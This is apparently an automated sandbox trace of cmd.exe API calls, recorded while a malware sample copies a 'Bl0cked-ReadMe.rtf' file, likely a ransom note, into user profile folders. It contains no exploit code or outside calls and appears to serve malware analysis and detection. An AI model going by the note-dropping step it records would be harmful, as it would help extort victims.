0x0 [0213.819] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x0, lpData=0x2aec00*=0x40, lpcbData=0x2aebf8*=0x1000) returned 0x2 [0213.819] RegCloseKey (hKey=0x40) returned 0x0 [0213.819] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aebf4 | out: phkResult=0x2aebf4*=0x40) returned 0x0 [0213.819] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x0, lpData=0x2aec00*=0x40, lpcbData=0x2aebf8*=0x1000) returned 0x2 [0213.819] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x4, lpData=0x2aec00*=0x1, lpcbData=0x2aebf8*=0x4) returned 0x0 [0213.819] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x0, lpData=0x2aec00*=0x1, lpcbData=0x2aebf8*=0x1000) returned 0x2 [0213.820] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x4, lpData=0x2aec00*=0x0, lpcbData=0x2aebf8*=0x4) returned 0x0 [0213.820] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x4, lpData=0x2aec00*=0x9, lpcbData=0x2aebf8*=0x4) returned 0x0 [0213.820] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x4, lpData=0x2aec00*=0x9, lpcbData=0x2aebf8*=0x4) returned 0x0 [0213.820] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x0, lpData=0x2aec00*=0x9, lpcbData=0x2aebf8*=0x1000) returned 0x2 [0213.820] RegCloseKey (hKey=0x40) returned 0x0 [0213.820] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863af [0213.820] srand (_Seed=0x5b8863af) [0213.820] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\Bl0cked-ReadMe.rtf\"" [0213.820] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\Bl0cked-ReadMe.rtf\"" [0213.820] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.820] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3f18e8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0213.821] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0213.821] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0213.821] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0213.821] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0213.821] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0213.821] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0213.821] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0213.821] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0213.821] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0213.821] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0213.821] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0213.821] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0213.821] GetEnvironmentStringsW () returned 0x3f22d8* [0213.821] FreeEnvironmentStringsW (penv=0x3f22d8) returned 1 [0213.821] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.821] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0213.821] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0213.821] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0213.821] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0213.821] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0213.822] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0213.822] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0213.822] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0213.822] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0213.822] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af9c0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.822] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af9c0, lpFilePart=0x2af9bc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af9bc*="Desktop") returned 0x18 [0213.822] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0213.822] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af73c | out: lpFindFileData=0x2af73c) returned 0x3f0018 [0213.822] FindClose (in: hFindFile=0x3f0018 | out: hFindFile=0x3f0018) returned 1 [0213.822] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af73c | out: lpFindFileData=0x2af73c) returned 0x3f0018 [0213.822] FindClose (in: hFindFile=0x3f0018 | out: hFindFile=0x3f0018) returned 1 [0213.823] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af73c | out: lpFindFileData=0x2af73c) returned 0x3f0018 [0213.823] FindClose (in: hFindFile=0x3f0018 | out: hFindFile=0x3f0018) returned 1 [0213.823] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0213.823] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0213.823] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0213.823] GetEnvironmentStringsW () returned 0x3f2af8* [0213.823] FreeEnvironmentStringsW (penv=0x3f2af8) returned 1 [0213.823] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.824] GetConsoleOutputCP () returned 0x1b5 [0213.824] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0213.824] GetUserDefaultLCID () returned 0x409 [0213.824] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0213.824] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2afb00, cchData=128 | out: lpLCData="0") returned 2 [0213.824] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2afb00, cchData=128 | out: lpLCData="0") returned 2 [0213.825] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2afb00, cchData=128 | out: lpLCData="1") returned 2 [0213.825] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0213.825] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0213.825] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0213.825] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0213.825] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0213.825] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0213.825] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0213.825] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0213.825] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0213.825] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0213.825] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0213.826] GetConsoleTitleW (in: lpConsoleTitle=0x3e08e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.826] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0213.826] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0213.826] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0213.826] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0213.827] _wcsicmp (_String1="type", _String2=")") returned 75 [0213.827] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0213.827] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0213.828] _wcsicmp (_String1="IF", _String2="type") returned -11 [0213.828] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0213.828] _wcsicmp (_String1="REM", _String2="type") returned -2 [0213.828] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0213.833] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.833] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.833] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.833] GetFileType (hFile=0x7) returned 0x2 [0214.060] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0214.060] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2af9f8 | out: lpMode=0x2af9f8) returned 1 [0214.061] _dup (_FileHandle=1) returned 3 [0214.061] _close (_FileHandle=1) returned 0 [0214.061] _wcsicmp (_String1="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0214.061] CreateFileW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2af9c8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0214.062] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0214.062] GetConsoleTitleW (in: lpConsoleTitle=0x2af7f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.062] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0214.062] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0214.062] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0214.062] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0214.063] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0214.063] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x2af35c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2af35c) returned 0x3e0e78 [0214.063] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0214.063] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0214.063] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0214.064] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ae268, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0214.064] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0214.064] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.064] GetFileType (hFile=0x54) returned 0x1 [0214.064] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.064] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x2ae2c0 | out: lpFileSizeHigh=0x2ae2c0*=0x0) returned 0x1632 [0214.064] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.064] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0214.064] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.064] ReadFile (in: hFile=0x54, lpBuffer=0x2af0f8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae2e8, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesRead=0x2ae2e8*=0x200, lpOverlapped=0x0) returned 1 [0214.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.064] GetFileType (hFile=0x4c) returned 0x1 [0214.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.064] GetFileType (hFile=0x4c) returned 0x1 [0214.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.064] WriteFile (in: hFile=0x4c, lpBuffer=0x2af0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.065] GetFileType (hFile=0x4c) returned 0x1 [0214.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.065] WriteFile (in: hFile=0x4c, lpBuffer=0x2af148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af148*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.065] GetFileType (hFile=0x4c) returned 0x1 [0214.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.066] WriteFile (in: hFile=0x4c, lpBuffer=0x2af198*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af198*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.066] GetFileType (hFile=0x4c) returned 0x1 [0214.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.066] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af1e8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.066] GetFileType (hFile=0x4c) returned 0x1 [0214.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.066] WriteFile (in: hFile=0x4c, lpBuffer=0x2af238*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af238*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.066] GetFileType (hFile=0x4c) returned 0x1 [0214.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.066] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.066] GetFileType (hFile=0x4c) returned 0x1 [0214.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.066] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae2dc*=0x20, lpOverlapped=0x0) returned 1 [0214.066] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.066] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae2c8 | out: lpNewFilePointer=0x0) returned 1 [0214.066] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.066] ReadFile (in: hFile=0x54, lpBuffer=0x2af0f8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae2e8, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesRead=0x2ae2e8*=0x200, lpOverlapped=0x0) returned 1 [0214.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.066] GetFileType (hFile=0x4c) returned 0x1 [0214.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.066] GetFileType (hFile=0x4c) returned 0x1 [0214.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.066] WriteFile (in: hFile=0x4c, lpBuffer=0x2af0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.067] GetFileType (hFile=0x4c) returned 0x1 [0214.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.067] WriteFile (in: hFile=0x4c, lpBuffer=0x2af148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af148*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.067] GetFileType (hFile=0x4c) returned 0x1 [0214.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.067] WriteFile (in: hFile=0x4c, lpBuffer=0x2af198*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af198*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.067] GetFileType (hFile=0x4c) returned 0x1 [0214.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.067] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af1e8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.067] GetFileType (hFile=0x4c) returned 0x1 [0214.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.067] WriteFile (in: hFile=0x4c, lpBuffer=0x2af238*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af238*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.067] GetFileType (hFile=0x4c) returned 0x1 [0214.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.067] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.067] GetFileType (hFile=0x4c) returned 0x1 [0214.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.067] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae2dc*=0x20, lpOverlapped=0x0) returned 1 [0214.067] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.067] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae2c8 | out: lpNewFilePointer=0x0) returned 1 [0214.067] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.067] ReadFile (in: hFile=0x54, lpBuffer=0x2af0f8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae2e8, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesRead=0x2ae2e8*=0x200, lpOverlapped=0x0) returned 1 [0214.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.068] GetFileType (hFile=0x4c) returned 0x1 [0214.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.068] GetFileType (hFile=0x4c) returned 0x1 [0214.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.068] WriteFile (in: hFile=0x4c, lpBuffer=0x2af0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.068] GetFileType (hFile=0x4c) returned 0x1 [0214.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.068] WriteFile (in: hFile=0x4c, lpBuffer=0x2af148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af148*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.068] GetFileType (hFile=0x4c) returned 0x1 [0214.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.068] WriteFile (in: hFile=0x4c, lpBuffer=0x2af198*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af198*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.068] GetFileType (hFile=0x4c) returned 0x1 [0214.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.068] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af1e8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.068] GetFileType (hFile=0x4c) returned 0x1 [0214.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.068] WriteFile (in: hFile=0x4c, lpBuffer=0x2af238*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af238*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.068] GetFileType (hFile=0x4c) returned 0x1 [0214.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.068] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.068] GetFileType (hFile=0x4c) returned 0x1 [0214.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.068] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae2dc*=0x20, lpOverlapped=0x0) returned 1 [0214.069] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.069] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae2c8 | out: lpNewFilePointer=0x0) returned 1 [0214.069] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.069] ReadFile (in: hFile=0x54, lpBuffer=0x2af0f8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae2e8, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesRead=0x2ae2e8*=0x200, lpOverlapped=0x0) returned 1 [0214.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.069] GetFileType (hFile=0x4c) returned 0x1 [0214.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.069] GetFileType (hFile=0x4c) returned 0x1 [0214.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.069] WriteFile (in: hFile=0x4c, lpBuffer=0x2af0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.069] GetFileType (hFile=0x4c) returned 0x1 [0214.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.069] WriteFile (in: hFile=0x4c, lpBuffer=0x2af148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af148*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.069] GetFileType (hFile=0x4c) returned 0x1 [0214.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.069] WriteFile (in: hFile=0x4c, lpBuffer=0x2af198*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af198*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.069] GetFileType 